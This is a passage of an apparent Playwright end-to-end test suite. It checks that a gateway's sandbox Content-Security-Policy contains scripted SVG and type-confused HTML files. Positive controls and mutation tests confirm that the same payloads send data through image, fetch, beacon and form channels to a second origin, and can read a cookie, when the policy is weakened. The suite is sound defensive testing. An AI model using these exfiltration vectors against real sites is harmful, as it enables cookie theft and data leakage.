      expect(ISOLATION_POLICY, `every derived source must appear in the policy. ${evidence}`)
        .toContain(source);
    }
    // A loopback bind is the default install and the case that broke Safari;
    // one entry there means the alias rule was lost.
    if (/^https?:\/\/(127\.|localhost|\[::1\])/.test(canonical)) {
      expect(sources.length, `§10.3: a loopback bind names all three spellings. ${evidence}`).toBe(3);
    }
  });

  /**
   * FR-008b / FR-015 / MV-13 for the `.svg` row specifically.
   *
   * §10.4's justification for putting the one scriptable non-HTML format on the
   * allow-list is exactly this: "the token path applies ONE policy to every byte
   * it serves". That sentence is the whole argument, so it gets asserted on an
   * SVG rather than inferred from the HTML case.
   */
  test('an .svg on the token path is image/svg+xml, nosniff, inline, with the §10.3 policy byte for byte', async () => {
    const res = await api.get(tokenURL(FILE_SCRIPTED_SVG));
    expect(res.status()).toBe(200);
    const h = res.headers();
    expect(h['content-type']).toBe(TYPE_SVG);
    expect(h['x-content-type-options']).toBe('nosniff');
    expect(h['content-disposition']).toMatch(/^inline/);
    expect(
      h['content-security-policy'],
      'If this reports a DIFFERENT policy rather than a missing one, check that the gateway ' +
        'answering OMNIPUS_URL is the one under test. A port collision with a second, ' +
        'differently-built gateway produced exactly this failure once, and it reads as a ' +
        'product regression rather than as the environment problem it is.',
    ).toBe(ISOLATION_POLICY);
    expect(h['referrer-policy']).toBe('no-referrer');
  });

  /**
   * Spec test 94 — E2E_SvgWithScript_TopLevel_IsInert (FR-008a).
   *
   * The context §10.4 admits was never measured: an SVG opened as a DOCUMENT at
   * its own token URL, with a script that tries to beacon the cookie out.
   */
  test('94 — a scripted SVG opened top-level at its token URL reaches nothing and reads nothing', async ({
    page,
  }) => {
    const from = mark();
    const response = await page.goto(tokenHref(FILE_SCRIPTED_SVG));
    expect(response, 'navigation produced no response').not.toBeNull();
    // Assert on the header the BROWSER actually received, not a separate fetch.
    expect(response!.headers()['content-security-policy']).toBe(ISOLATION_POLICY);
    expect(response!.headers()['content-type']).toBe(TYPE_SVG);

    // Report first, form second, settle last — the form submit navigates the
    // document away when it succeeds, and would take the report with it.
    const report = await readReport(page);
    await fireDeferredForm(page);

    const got = await settleThenRead('doc', from);
    expect(got, `egress reached the second origin from a sandboxed SVG document: ${got.join(', ')}`)
      .toEqual([]);

    // Corroborating, and only corroborating: the sandbox's opaque origin is
    // what makes the cookie unreadable, and §10.3 calls the missing
    // `allow-same-origin` "the load-bearing omission".
    expect(report.origin, 'window.origin under the sandbox directive').toBe('null');
    expect(report.cookie, 'document.cookie under an opaque origin must THROW, not return empty')
      .toMatch(/^THREW:/);
  });

  /**
   * 94's positive control. Without it the test above proves nothing: an SVG
   * whose script never ran, or a sink nobody can reach, produces the same
   * empty hit list as perfect containment.
   */
  test('94 positive control — the same SVG bytes with no policy DO reach the second origin', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(`${control.origin}/${FILE_SCRIPTED_SVG}`);
    const report = await readReport(page);
    await fireDeferredForm(page);

    const got = await waitForVectors('docctrl', from, ['img', 'fetch', 'beacon']);
    expect(
      got,
      'the payload or the sink is broken — an un-policed scripted SVG must leak, ' +
        'or every negative in this file is vacuous',
    ).toEqual(expect.arrayContaining(['img', 'fetch', 'beacon']));

    // The cookie channel is real too — the experiment's `nosandbox` row read
    // back `omnipus_probe=SECRET`, so "the cookie THREW" above is a difference
    // the policy made, not a property of SVG documents in general.
    expect(report.cookie ?? '').toContain('omnipus_probe=SECRET');
  });

  /**
   * Spec test 122 — an SVG subresource renders and stays inert.
   *
   * The second of §10.4's three contexts, and the one that catches BOTH failure
   * directions at once: dropping `.svg` from the allow-list makes the image stop
   * painting, and swapping the embed to `<object>`/`<iframe>` makes the script
   * run.
   */
  test('122 — an SVG subresource inside a sandboxed bundle DECODES and stays inert', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(tokenHref(FILE_INDEX_HTML));

    // "Decoded", not "200". A broken image also completes, with naturalWidth 0.
    const decoded = await page.evaluate(async () => {
      const img = document.getElementById('logo') as HTMLImageElement | null;
      if (!img) return { state: 'no-img' };
      let state = 'decoded';
      try {
        await img.decode();
      } catch (e) {
        state = 'FAILED:' + String(e);
      }
      return { state, naturalWidth: img.naturalWidth, naturalHeight: img.naturalHeight };
    });
    expect(
      decoded.state,
      'the SVG did not paint — this is what dropping .svg from the §10.4 allow-list looks like',
    ).toBe('decoded');
    expect(decoded.naturalWidth).toBe(64);
    expect(decoded.naturalHeight).toBe(32);

    const got = await settleThenRead('imgtoken', from);
    expect(
      got,
      `the SVG subresource EXECUTED — an <img> must run SVG in secure static mode: ${got.join(', ')}`,
    ).toEqual([]);
  });

  /**
   * 122's positive control — the payload really is scripted.
   *
   * Deliberately `<object>`, not `<img>`: an `<img>` neutralises the script on
   * every engine even with no policy, so an `<img>`-based control could not tell
   * a live payload from a dead one.
   */
  test('122 positive control — the same logo.svg in an <object> with no policy DOES execute', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(`${control.origin}/object-control.html`);
    await fireDeferredForm(page);
    const got = await waitForVectors('imgctrl', from, ['img', 'fetch', 'beacon']);
    expect(
      got,
      'the logo.svg payload is inert on its own — 122 above would then assert nothing',
    ).toEqual(expect.arrayContaining(['img', 'fetch', 'beacon']));
  });

  /**
   * Type confusion, forward direction (FR-015, FR-015b, FR-016).
   *
   * HTML bytes under a `.svg` name. A server that sniffed would answer
   * `text/html` — the bytes begin `<!doctype html>` — and the browser would
   * execute a real document. The Content-Type table is compiled in and keyed by
   * EXTENSION, so the answer must be `image/svg+xml` on every machine.
   */
  test('type confusion — HTML bytes named .svg are typed by extension and never execute', async ({
    page,
  }) => {
    const from = mark();
    const res = await api.get(tokenURL(FILE_CONFUSED_SVG));
    expect(res.status()).toBe(200);
    const h = res.headers();
    expect(h['content-type'], 'a sniffing implementation answers text/html here').toBe(TYPE_SVG);
    expect(h['x-content-type-options']).toBe('nosniff');
    expect(h['content-security-policy']).toBe(ISOLATION_POLICY);

    await page.goto(tokenHref(FILE_CONFUSED_SVG));

    const contentType = await page.evaluate(() => document.contentType);
    expect(contentType, 'the document was parsed as the extension says, not as the bytes look')
      .toBe(TYPE_SVG);
    expect(await page.title(), 'the HTML payload executed').not.toBe('EVIL_EXECUTED');
    expect(await page.locator('#evil-marker').count(), 'the HTML payload rendered as a document')
      .toBe(0);

    await fireDeferredForm(page);
    const got = await settleThenRead('confusedsvg', from);
    expect(got, `type-confused payload reached the second origin: ${got.join(', ')}`).toEqual([]);
  });

  /**
   * The forward case's positive control: the SAME bytes, served as `text/html`
   * with no policy, execute completely. Without it, "nothing happened" is
   * indistinguishable from "the payload was never live" — which is exactly the
   * trap the experiment's own §6A.3 positive control existed to close.
   */
  test('type confusion positive control — the same bytes served as text/html DO execute', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(`${control.origin}/evil-as-html.html`);
    await expect
      .poll(async () => page.title(), { timeout: SETTLE_MS })
      .toBe('EVIL_EXECUTED');
    await fireDeferredForm(page);
    const got = await waitForVectors('confusedctrl', from, ['img', 'fetch', 'beacon']);
    expect(got).toEqual(expect.arrayContaining(['img', 'fetch', 'beacon']));
  });

  /**
   * Type confusion, reverse direction.
   *
   * SVG bytes under a `.html` name. The extension wins again — the response is
   * `text/html`, so the browser DOES build a scriptable document out of it (an
   * HTML parser executes scripts inside inline SVG). That is the correct
   * outcome, and the reason `.html` is on the allow-list at all: containment
   * here comes from the §10.3 policy, not from the type.
   *
   * Together with the forward case this is what proves dispatch is by extension
   * rather than by content: one file whose bytes say HTML is served as SVG, and
   * one whose bytes say SVG is served as HTML.
   */
  test('type confusion, reverse — SVG bytes named .html are typed text/html and stay contained', async ({
    page,
  }) => {
    const res = await api.get(tokenURL(FILE_CONFUSED_HTML));
    expect(res.status()).toBe(200);
    const h = res.headers();
    expect(h['content-type'], 'a sniffing implementation answers image/svg+xml here').toBe(TYPE_HTML);
    expect(h['x-content-type-options']).toBe('nosniff');
    expect(h['content-security-policy']).toBe(ISOLATION_POLICY);

    const from = mark();
    await page.goto(tokenHref(FILE_CONFUSED_HTML));
    await fireDeferredForm(page);
    const got = await settleThenRead('confusedhtml', from);
    expect(got, `egress from an SVG parsed as HTML: ${got.join(', ')}`).toEqual([]);
  });

  /**
   * The reverse case's positive control — those same bytes, parsed as HTML with
   * no policy, really do run. This is what makes the containment above a
   * measurement rather than an assumption that SVG-in-HTML never executes.
   */
  test('type confusion, reverse — positive control: the same bytes as HTML with no policy DO execute', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(`${control.origin}/svg-as-html.html`);
    await fireDeferredForm(page);
    const got = await waitForVectors('confusedhtmlctrl', from, ['img', 'fetch', 'beacon']);
    expect(
      got,
      'inline SVG script did not run even un-policed — the reverse case above would assert nothing',
    ).toEqual(expect.arrayContaining(['img', 'fetch', 'beacon']));
  });

  /**
   * FR-015c's one stated default, and the sharpest available end-to-end
   * evidence that the response does not consult the host MIME registry or the
   * bytes: an extension on no table, carrying HTML, must come back
   * `application/octet-stream` AND as an attachment.
   *
   * Scope, stated honestly: this catches SNIFFING (which would answer
   * `text/html`) and it catches an implementation that falls through to the
   * operating system for a type it happens to know. It cannot, from a browser,
   * distinguish "compiled-in table" from "host registry that agrees with the
   * table" for an extension BOTH know — that is test 3a's job
   * (`TestLibraryInline_TypeIsHostIndependent`, integration level), and it lives
   * in pkg/gateway on purpose.
   */
  test('an extension on no table is application/octet-stream and an attachment, never sniffed', async () => {
    const res = await api.get(tokenURL(FILE_UNKNOWN_EXT));
    expect(res.status()).toBe(200);
    const h = res.headers();
    expect(h['content-type'], 'sniffing HTML bytes would answer text/html').toBe(TYPE_UNKNOWN);
    expect(h['content-disposition']).toMatch(/^attachment/);
    expect(h['x-content-type-options']).toBe('nosniff');
    // §10.3's "whatever the file's type" — an ATTACHMENT on the token path
    // still carries the policy, unlike one on the authenticated path below.
    expect(h['content-security-policy']).toBe(ISOLATION_POLICY);
  });

  /**
   * Test 123's third context, from the browser side.
   *
   * The SPA fetches an image over the AUTHENTICATED Library path and draws it in
   * an `<img>`. That path must keep answering `attachment` with the
   * extension-derived type — so even a future SPA change that NAVIGATED to the
   * URL instead of drawing it gets a download, not a document. MV-13's negative
   * half rides along: the authenticated path carries no isolation policy, and
   * asserting that is what stops the two paths quietly becoming one.
   *
   * The Go-side half of 123 (classification, `<img>` mount, no `<object>`) is
   * pkg/gateway/library_svg_contexts_test.go and src/components/library — both
   * outside this file's ownership.
   */
  test('123 (browser-visible half) — the authenticated Library URL answers with an attachment and no policy', async () => {
    const res = await api.get(
      `/api/v1/library/${workspaceID}/download?path=${encodeURIComponent(`${FIXTURE_DIR}/${FILE_LOGO_SVG}`)}`,
    );
    expect(res.status()).toBe(200);
    const h = res.headers();
    expect(h['content-type']).toBe(TYPE_SVG);
    expect(h['content-disposition']).toMatch(/^attachment/);
    expect(h['x-content-type-options']).toBe('nosniff');
    expect(
      h['content-security-policy'],
      'the authenticated path must NOT carry the isolation policy (MV-13, second half)',
    ).toBeUndefined();
  });

  /**
   * ════════════════════════════════════════════════════════════════════════
   * MUTATION A — the sandbox directive removed from the REAL gateway response.
   * ════════════════════════════════════════════════════════════════════════
   *
   * This is the proof that test 94's opaque-origin and cookie assertions can
   * FAIL. The gateway's own bytes and its own headers are served, with exactly
   * one change: the leading `sandbox allow-scripts; ` is gone, leaving the
   * source directives — the experiment's `nosandbox` row.
   *
   * Measured there on all three engines: origin no longer opaque, and
   * `document.cookie` READABLE. So the two assertions test 94 relies on go red
   * the moment that directive is dropped, which is what FR-005a means by "an
   * implementation shipping either half satisfies neither FR-005 nor FR-006".
   */
  test('MUTATION A — with the sandbox directive dropped, the SVG document is no longer contained', async ({
    page,
  }) => {
    const from = mark();
    await withMutatedPolicy(page, tokenHref(FILE_SCRIPTED_SVG), SOURCES_ONLY_POLICY, async () => {
      const response = await page.goto(tokenHref(FILE_SCRIPTED_SVG));
      expect(response!.headers()['content-security-policy']).toBe(SOURCES_ONLY_POLICY);
      const report = await readReport(page);
      await fireDeferredForm(page);
      await new Promise((r) => setTimeout(r, SETTLE_MS));

      // Test 94 asserts `origin === 'null'` and `cookie` matching /^THREW:/.
      // Both are false here. That is the point of this test.
      expect(report.origin, 'without the sandbox directive the origin is the gateway, not opaque')
        .toBe(new URL(BASE_URL).origin);
      expect(report.cookie ?? '', 'without the sandbox directive document.cookie no longer throws')
        .not.toMatch(/^THREW:/);
    });
  });

  /**
   * ════════════════════════════════════════════════════════════════════════
   * MUTATION B — the source directives removed, and its paired negative.
   * ════════════════════════════════════════════════════════════════════════
   *
   * The other half of FR-005a, and the proof that every "reached nothing"
   * assertion in this file CAN fail.
   *
   * The pair below is one experiment run twice: the SAME scripted SVG bytes,
   * from the SAME origin, over a real socket, differing ONLY in the
   * Content-Security-Policy header. §10.3's literal string blocks everything;
   * §10.3 with its source directives removed — the experiment's `sandboxonly`
   * row — lets the traffic straight out, while STILL sealing the origin and
   * still making `document.cookie` throw.
   *
   * That last detail is why this test earns its place: a test that checked only
   * the cookie would report green while the page exfiltrated freely.
   *
   * Why not the gateway's own response, as MUTATION A uses: see the file header.
   * `route.fulfill()` suppresses cross-origin loopback subresources in Chromium,
   * which would have turned this mutation into a silent false pass.
   */
  test('MUTATION B (negative half) — the §10.3 string on a plain origin blocks every vector', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(`${control.origin}/policy-full.svg`);
    const report = await readReport(page);
    await fireDeferredForm(page);
    const got = await settleThenRead('mutfull', from);
    expect(
      got,
      `the §10.3 policy string did not contain the payload: ${got.join(', ')}`,
    ).toEqual([]);
    expect(report.origin, 'the §10.3 string must produce an opaque origin anywhere').toBe('null');
    expect(report.cookie, 'document.cookie must THROW under §10.3').toMatch(/^THREW:/);
  });

  test('MUTATION B — with the source directives dropped, the same payload leaks to the second origin', async ({
    page,
  }) => {
    const from = mark();
    await page.goto(`${control.origin}/policy-sandbox-only.svg`);
    // Read before firing the form: under sandbox-only the submit is still
    // blocked, but the ordering rule holds everywhere so it cannot be got wrong
    // by copying one of these tests into a case where it is not.
    const report = await readReport(page);
    await fireDeferredForm(page);
    const got = await waitForVectors('mutbsandboxonly', from, MUTATION_B_ESCAPES);
    expect(
      got,
      'sandbox alone did NOT let these out — then every "reached nothing" assertion above ' +
        `had nothing to block, and its empty hit list proves nothing. Report: ${JSON.stringify(report)}`,
    ).toEqual(expect.arrayContaining([...MUTATION_B_ESCAPES]));

    // The asymmetry FR-005a is built on: the sandbox half is still sealing the
    // origin and still making the cookie throw, while everything walks out the
    // front. Half a policy looks exactly like a whole one from inside the page.
    expect(report.origin).toBe('null');
    expect(report.cookie).toMatch(/^THREW:/);
  });
});
